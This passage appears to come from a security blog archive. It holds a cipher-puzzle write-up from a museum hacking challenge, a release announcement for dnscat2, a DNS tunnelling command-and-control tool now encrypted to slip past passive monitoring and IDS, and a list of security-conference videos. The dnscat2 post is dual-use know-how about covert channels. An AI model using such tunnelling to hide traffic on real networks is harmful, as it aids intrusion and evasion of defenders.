That's when we noticed the "A = 50" in the corner, and realized that things were probably shifted by 5. Instead of manually converting it, we found a shift cipher bruteforcer that we could use. The result was: FADED FASHIONISTA

Searching for "Faded Fashionista Air and Space" led us to this Smithsonian Article: Amelia Earhart, Fashionista. Neither of us knew where her exhibit was, but eventually we tracked it down on the map and walked around it until we found her Lockheed Vega, the QR code scanned to amelias_vega.

Challenge 3: Hacker of Speed

This was an image of some folks ready to board a plane or something:

This super top secret photo has been censored. The security guys looked at this SO fast, maybe they missed something?

Because of the hint, we started looking for mistakes in the censoring and noticed that they're wearing boots that say "X-15":

We found pictures of the X-15 page on the museum's Web site and remembered seeing the plane on the 2nd floor. We reached the artifact and determined that the QR code read faster_than_superman.

Once we got to the artifact, we noticed that we hadn't broken the code yet. Looking carefully at the image, we saw the text at the bottom, nbdi_tjy_qpjou_tfwfo_uxp.

As an avid cryptogrammer, I recognized tfwfo as likely being "never". Since 'e' is one character before 'f', it seemed likely that it was a single shift ('b'->'a', 'c'->'b', etc). I mentally shifted the first couple letters of the sentence, and it looked right, so I did the entire string while Eric wrote it down: mach_six_point_seven_two.

The funny thing is, the word was "seven", not "never", but the "e"s still matched!

Challenge 4: Hacker of Design

While researching some physics based penetration testing, you find this interesting diagram. You feel like you've seen this device before... maybe somewhere or on something in the Air and Space museum?

The diagram reminded Eric of an engine he saw on an earlier visit, we found the artifact on the other side of the museum:

Unfortunately there was no QR code so we decided to work on decoding the challenge to discover the location of the artifact.

Now that we'd seen the hint on Challenge 2, we were more prepared for a diagram to help us! In this case, it was a drawing of an atom and the number "10". We concluded that the numbers probably referred to the atomic weight for elements on the periodic table, and converted them as such:

10=>Ne
74=>W
... and so on.

After decoding the full string, we ended up with:

new_plan_schwalbe

We actually made a mistake in decoding the string, but managed to find it anyways thanks to search autocorrect. :)

After searching for "schwalbe air and space", we found this article, which led us to the artifact: the Messerschmitt Me 262 A-1a Schwalbe (Swallow). The QR code scanned revealed the_swallow.

Challenge 5: Hacker of Distance

While at the bar, listening to some Dual Core, planning your next conference-fest with some fellow hackers, you find this interesting napkin. Your mind begins to wander. Why doesn't Dual Core have a GOLDEN RECORD?! Also, is this napkin trying to tell you something in a around-about way?

The hidden text on this one was obvious… morse code! Typing the code into a phone (not fun!), we ended up with .- -.. .- ... - .-. .- .--. . .-. .- ... .--. . .-. .-, which translates to ADASTRAPERASPERA

According to Google, that slogan is used by a thousand different organizations, none of which seemed to be space or air related. However, searching for "Golden Record Air and Space" returned several results for the Voyager space probe. We looked at our map and scurried to the exhibit on the other side of the museum:

Once we made it to the exhibit finding the QR code was easy, scanning it revealed, the_princess_is_in_another_castle. The decoy flag!

We tried searching keywords from the napkin but none of the results seemed promising. After a few frustrating minutes we saw the museum banquet director and asked him for help. He told us that the plane we were looking for was close to the start of the challenge, we made a dash for the first floor and found the correct Voyager exhibit:

Scanning the QR code revealed the code, missing_canards.

Challenge 6: Hacker of Guidance

The sixth challenge gave us a map with some information:

You have intercepted this map that appears to target something. The allies would really like to know the location of the target. Also, they'd like to know what on Earth is at that location.

We immediately noticed the hex-encoded numbers on the left:

35342e3133383835322c
31332e373637373235

Which translates to 54.138852,13.767725. We googled the coordinates, and it turned out to be a location in Germany: Flughafenring, 17449 Peenemünde, Germany.

After many failed searches we tried "Peenemünde ww2 air and space", which led to a reference to the German V2 Rocket. Here is the exhibit and QR code:

Scanning the QR code revealed aggregat_4, the formal name for the V-2 rocket.

Challenge 7: Hacker of Coding

This is an image with a cipher on the right:

Your primary computer's 0.043MHz CPU is currently maxed out with other more important tasks, so converting all these books of source code to assembly is entirely up to you.

On the chalkboard is a cipher:

We couldn't remember what it was called, and ended up searching for "line dot cipher", which immediately identified it as a pigpen cipher. The pigpen cipher can be decoded with this graphic:

Essentially, you find the shape containing the letter that corresponds to the shape in that graphic. So, the first letter is ">" on the chalkboard, which maps to 'T'. The second is the upper three quarters of a square, which matches up with 'H', and the third is a square, which matches to E. And so on.

Initially we found a version that didn't map to the proper English characters, and translated it to:

Later, we did it right and found the text "THE BEST SHIP TO COME DOWN THE LINE"

To find the artifact, we googled "0.043MHz", and immediately discovered it was "Apollo 11".

The QR code scanned to the_eleventh_apollo

And that's it!

And that's the end of the cipher portion of the challenge! We were first place by only a few minutes. :)

The last part of the challenge involved throwing wood airplanes. Because our plane didn't go backwards, it wasn't the worst, but it's nothing to write home about!

But in the end, it was a really cool way to see a bunch of artifacts and also break some codes!

dnscat2: now with crypto!

Hey everybody,

Live from the SANS Pentest Summit, I'm excited to announce the latest beta release of dnscat2: 0.04! Besides some minor cleanups and UI improvements, there is one serious improvement: all dnscat2 sessions are now encrypted by default!

Read on for some user information, then some implementation details for those who are interested! For all the REALLY gory information, check out the protocol doc!

Tell me what's new!

By default, when you start a dnscat2 client, it now performs a key exchange with the server, and uses a derived session key to encrypt all traffic. This has the huge advantage that passive surveillance and IDS and such will no longer be able to see your traffic. But the disadvantage is that it's vulnerable to a man-in-the-middle attack - assuming somebody takes the time and effort to perform a man-in-the-middle attack against dnscat2, which would be awesome but seems unlikely. :)

By default, all connections are encrypted, and the server will refuse to allow cleartext connections. If you start the server with --security=open (or run set security=open), then the client decides the security level - including cleartext.

If you pass the server a --secret string (see below), then the server will require clients to authenticate using the same --secret value. That can be turned off by using --security=open or --security=encrypted (or the equivalent set commands).

Let's look at the man-in-the-middle protection...

Short authentication strings

First, by default, a short authentication string is displayed on both the client and the server. Short authentication strings, inspired by ZRTP and Silent Circle, are a visual way to tell if you're the victim of a man-in-the-middle attack.

Essentially, when a new connection is created, the user has to manually match the short authentication strings on the client and the server. If they're the same, then it's a legit connection. Here's what it looks like on the client:

Encrypted session established! For added security, please verify the server also displays this string:

Tort Hither Harold Motive Nuns Unwrap

And the server:

New window created: 1
Session 1 security: ENCRYPTED BUT *NOT* VALIDATED
For added security, please ensure the client displays the same string:

>> Tort Hither Harold Motive Nuns Unwrap

There are 256 different possible words, so six words gives 48 bits of protection. While a 48-bit key can eventually be bruteforced, in this case it has to be done in real time, which is exceedingly unlikely.

Authentication

Alternatively, a pre-shared secret can be used instead of a short authentication string. When you start the server, you pass in a --secret value, such as --secret=pineapple. Clients with the same secret will create an authenticator string based on the password and the cryptographic keys, and send it to the server, encrypted, after the key exchange. Clients that use the wrong key will be summarily rejected.

Details on how this is implemented are below.

How stealthy is it?

To be perfectly honest: not completely.

The key exchange is pretty obvious. A 512-bit value has to be sent via DNS, and a 512-bit response has to come back. That's pretty big, and stands out.

After that, every packet has an unencrypted 40-bit (5-byte) header and an unencrypted 16-bit (2-byte) nonce. The header contains three bytes that don't really change, and the nonce is incremental. Any system that knows to look for dnscat2 will be able to find that.

It's conceivable that I could make this more stealthy, but anybody who's already trying to detect dnscat2 traffic will be able to update the signatures that they would have had to write anyway, so it becomes a cat-and-mouse game.

Of course, that doesn't stop people from patching things. :)

The plus side, however, is that none of your data leaks! And somebody would have to be specifically looking for dnscat2 traffic to recognize it.

What are the hidden costs?

Encrypted packets have 64 bits (8 bytes) of extra overhead: a 16-bit (two-byte) nonce and a 48-bit (six-byte) signature on each packet. Since DNS packets have between 200 and 250 bytes of payload space, that means we lose ~4% of our potential bandwidth.

Additionally, there's a key exchange packet and potentially an authentication packet. That's two extra roundtrips over a fairly slow protocol.

Other than that, not much changes, really. The encryption/decryption/signing/validation are super fast, and it uses a stream cipher so the length of the messages don't change.

How do I turn it off?

The server always supports crypto; if you don't WANT crypto, you'll have to manually hack the server or use a version of dnscat2 server <=0.03. But you'll have to manually turn off encryption in the client; otherwise, the connection fail.

Speaking of turning off encryption in the client: you can compile without encryption by using make nocrypto. You can also disable encryption at runtime with dnscat2 --no-encryption. On Visual Studio, you'll have to define "NO_ENCRYPTION". Note that the server, by default, won't allow either of those to connect unless you start it with --security=open.

Give me some technical details!

Your best bet if you're REALLY curious is to check out the protocol doc, where I document the protocol in full.

But I'll summarize it here. :)

The client starts a session by initiating a key exchange with the server. Both sides generate a random, 256-bit private key, then derive a public key using Elliptic Curve Diffie Hellman (ECDH). The client sends the public key to the server, the server sends a public key to the client, and they both agree on a shared secret.

That shared secret is hashed with a number of different values to derive purpose-specific keys - the client encryption key, the server encryption key, the client signing key, the server signing key, etc.

Once the keys are agreed upon, all packets are encrypted and signed. The encryption is salsa20 and uses one of the derived keys as well as an incremental nonce. After being encrypted, the encrypted data, the nonce, and the packet header are signed using SHA3, but truncated to 48 bits (6 bytes). 48 bits isn't very long for a signature, but space is at an extreme premium and for most attacks it would have to be broken in real time.

As an aside: I really wanted to encrypt the header instead of just signing it, but because of protocol limitations, that's simply not possible (because I have no way of knowing which packets belong to which session, the session_id has to be plaintext).

Immediately after the key exchange, the client optionally sends an authenticator over the encrypted session. The authenticator is based on a pre-shared secret (passed on the commandline) that the client and server pre-arrange in some way. That secret is hashed with both public keys and the secret (derived) key, as well as a different static string on the client and server. The client sends their authenticator to the server, and the server sends their authenticator to the client. In that way, both sides verify each other without revealing anything.

If the client doesn't send the authenticator, then a short authentication string is generated. It's based on a very similar hash to the authenticator, except without the pre-shared secret. The first 6 bytes are converted into words using a list of 256 English words, and are displayed on the screen. It's up to the user to verify them.

Because the nonce is only 16 bits, only 65536 roundtrips can be performed before running out. As such, the client may, at its own discretion (but before running out), initiate a new key exchange. It's identical to the original key exchange, except that it happens in a signed and encrypted packet. After the renegotiation is finished, both the client and server switch their nonce values back to 0 and stop accepting packets with the old keys.

And... that's about it! Keys are exchanged, an authenticator is sent or a short authentication string is displayed, all messages are signed and encrypted, and that's that!

Challenges

A few of the challenges I had to work through...

  • Because DNS has no concept of connections/sessions, I had to expose more information that I wanted in the packets (and because it's extremely length-limited, I had to truncate signatures)
  • I had originally planned to use Curve25519 for the key exchange, but there's no Ruby implementation
  • Finding a C implementation of ECC that doesn't require libcrypto or libssl was really hard
  • Finding a working SHA3 implementation in Ruby was impossible! I filed bugs against the three more popular implementations and one of them actually took the time to fix it!
  • Dealing with DNS's gratuitous retransmissions and accidental drops was super painful and required some hackier code than I like to see in crypto (for example, an old key can still be used, even after a key exchange, until the new one is used successfully; the more secure alternative can't handle a dropped response packet, otherwise both peers would have different keys)

Shouts out

I just wanted to do a quick shout out to a few friends who really made this happen by giving me advice, encouragement, or just listening to me complaining.

So, in alphabetical order so nobody can claim I play favourites, I want to give mad propz to:

  • Alex Weber, who notably convinced me to use a proper key exchange protocol instead of just a static key (and who also wrote the Salsa20 implementation I used
  • Brandon Enright, who give me a ton of handy crypto advice
  • Eric Gershman, who convinced me to work on encryption in the first place, and who listened to my constant complaining about how much I hate implementing crypto

Video archives of security conferences and workshops


Just some links for your enjoyment

List of security conferences in 2014

Video archives:




AIDE (Appalachian Institute of Digital Evidence)


Blackhat
Botconf
Bsides
Chaos Communication Congress
Defcon
Derbycon
Digital Bond's S4x14
Circle City Con
GrrCON Information Security Summit & Hacker Conference
Hack in the box HITB
InfowarCon
Ruxcon
Shmoocon
ShowMeCon
SkyDogCon
TakeDownCon
Troopers
Heidelberg Germany
Workshops, How-tos, and Demos

Special thanks to  Adrian Crenshaw for his collection of videos